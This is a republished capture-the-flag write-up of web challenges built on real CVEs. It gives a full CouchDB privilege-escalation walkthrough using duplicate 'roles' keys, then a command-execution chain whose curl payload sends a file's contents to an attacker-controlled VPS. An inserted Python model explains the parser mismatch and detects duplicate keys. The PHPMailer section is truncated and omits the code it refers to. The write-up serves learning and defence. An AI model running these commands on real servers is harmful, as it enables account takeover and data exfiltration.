Shulou (Shulou.com) 05/31 report, SLTechnology News & Howtos > Network Security, updated 2025-01-18
This article shares an example analysis of web challenges built around real CVEs. The editor thinks it is very practical, so it is shared here for learning; I hope you get something out of reading it.
0x00 Preface
Recently I have come across a number of CVE reproductions, some of them quite good. Today I introduce the following four challenges built around CVEs:
CVE-2017-12635 (CouchDB)
CVE-2016-10033 (PHPMailer)
CVE-2017-17562 (GoAhead)
CVE-2014-6271 (shellshock)
Note: the topics are ordered from simple to difficult.
0x01 CVE-2017-12635 (CouchDB)
After getting the challenge I found that port 80 could not be accessed, so I scanned the ports.
Port 5984 was found to be open.
Searching for it showed that this is a CouchDB vulnerability,
and then I found the 2017 CVE: CVE-2017-12635.
That is, because of the difference between CouchDB's Erlang-based JSON parser and its JavaScript-based JSON parser, a _users document with duplicate keys for the access-control roles can be submitted to the database, including the special _admin role that represents administrative users. Used in conjunction with CVE-2017-12636 (remote code execution), a non-administrator user can execute arbitrary shell commands on the server as the database system user.
The difference between the JSON parsers leads to the following behaviour: if two "roles" keys are present in the JSON, the second is used when authorizing the document write, but the first is used for all subsequent authorization of the newly created user. By design, users cannot assign their own roles; this vulnerability lets a non-administrator user give themselves administrator privileges.
For more information on vulnerabilities, see:
https://cert.360.cn/warning/detail?id=0bc3f86b333bf27fe26fe6fdc8bda5f8
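To make the parser-mismatch explanation concrete, here is an added Python model (not code from the original write-up or from CouchDB) of the two-parser flow and of the fix: a "last key wins" parser playing the role of the JavaScript side, a "first key wins" parser playing the role of the Erlang side, and a strict parser that rejects any object with a repeated key. The validate_user_doc rule and the create_user flow are simplified assumptions standing in for CouchDB's real validation, and the sample request body is constructed here with the same duplicate-"roles" shape as the one discussed above. has_duplicate_keys is the check a gateway or log-review script would apply to request bodies.

```python
import json

# Constructed sample body with the duplicate-"roles" shape discussed above:
# the first "roles" grants _admin, the second is empty.
DUPLICATE_ROLES_BODY = (
    '{"type": "user", "name": "sky", "roles": ["_admin"], "roles": [], "password": "sky"}'
)


def _last_wins(pairs):
    """Like JavaScript's JSON.parse: a repeated key keeps its last value."""
    return dict(pairs)


def _first_wins(pairs):
    """Like a proplist lookup: a repeated key keeps its first value."""
    result = {}
    for key, value in pairs:
        result.setdefault(key, value)
    return result


def _strict(pairs):
    """Hardened behaviour: refuse any object that repeats a key."""
    seen = set()
    for key, _ in pairs:
        if key in seen:
            raise ValueError(f"duplicate key {key!r} in JSON object")
        seen.add(key)
    return dict(pairs)


def parse_last_wins(raw):
    return json.loads(raw, object_pairs_hook=_last_wins)


def parse_first_wins(raw):
    return json.loads(raw, object_pairs_hook=_first_wins)


def parse_strict(raw):
    return json.loads(raw, object_pairs_hook=_strict)


def has_duplicate_keys(raw):
    """Detector for a gateway or request-log check: True if any object in the
    body (nested ones included) repeats a key; False for clean or unparsable JSON."""
    try:
        parse_strict(raw)
    except json.JSONDecodeError:
        return False          # not JSON at all; leave syntax errors to the application
    except ValueError:
        return True           # raised by _strict on a repeated key
    return False


def validate_user_doc(doc):
    """Write-time rule (simplified assumption, in the spirit of a
    validate_doc_update function): a non-admin caller may not assign roles."""
    return doc.get("roles", []) == []


def create_user(raw_body, parse_for_validation, parse_for_storage):
    """Model of the two-parser flow: one parser decides whether the write is
    allowed, another decides which roles the stored user actually has.
    Returns the effective roles of the created user."""
    if not validate_user_doc(parse_for_validation(raw_body)):
        raise PermissionError("only an admin may assign roles")
    return parse_for_storage(raw_body).get("roles", [])


def hardened_create_user(raw_body):
    """Same flow with the strict parser on both sides.
    Returns (True, roles) on success or (False, reason) on rejection."""
    try:
        return True, create_user(raw_body, parse_strict, parse_strict)
    except (ValueError, PermissionError) as exc:
        return False, str(exc)


if __name__ == "__main__":
    # Mismatched parsers: validation sees roles == [], storage keeps ["_admin"].
    print("mismatched parsers ->", create_user(DUPLICATE_ROLES_BODY, parse_last_wins, parse_first_wins))
    print("strict parser      ->", hardened_create_user(DUPLICATE_ROLES_BODY))
    print("duplicate keys?    ->", has_duplicate_keys(DUPLICATE_ROLES_BODY))
```

The point of the model is that the defect is not in either parser alone but in using two parsers with different duplicate-key semantics on the same untrusted bytes; the durable fix is to reject duplicate keys at the boundary (or to parse once and pass the resulting object to every check), which is what the strict variant does.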
So we can create an administrator user:
curl -X PUT 'http://192.168.5.39:5984/_users/org.couchdb.user:sky' --data-binary '{"type": "user", "name": "sky", "roles": ["_admin"], "roles": [], "password": "sky"}'
Then we can log in as that administrator user, and what follows is the exploitation of the privileged-access vulnerability (CVE-2017-12636):
curl -X PUT 'http://sky:sky@192.168.5.39:5984/_config/query_servers/cmd' -d '"/usr/bin/curl http://<your-vps>/`cat /home/flag.txt`"'
curl -X PUT 'http://sky:sky@192.168.5.39:5984/skytest'
curl -X PUT 'http://sky:sky@192.168.5.39:5984/skytest/vul' -d '{"_id": "770895a97726d5ca6d70a22173005c7b"}'
curl -X POST 'http://sky:sky@192.168.5.39:5984/skytest/_temp_view?limit=11' -d '{"language": "cmd", "map": ""}' -H 'Content-Type: application/json'
After a short while the flag arrived at the VPS:
Flag{ByeBye_1VerY0n1_have8un}
0x02 CVE-2016-10033 (PHPMailer)
Challenge URL: http://192.168.5.69/
It is a message-board interface.
I thought it was XSS, but after trying in vain for a long time I turned instead to leaking the source file.
Got the source code; the key vulnerability is here:
Visit
http://192.168.5.69/skyskysky.php
and it was found that the file had been written successfully.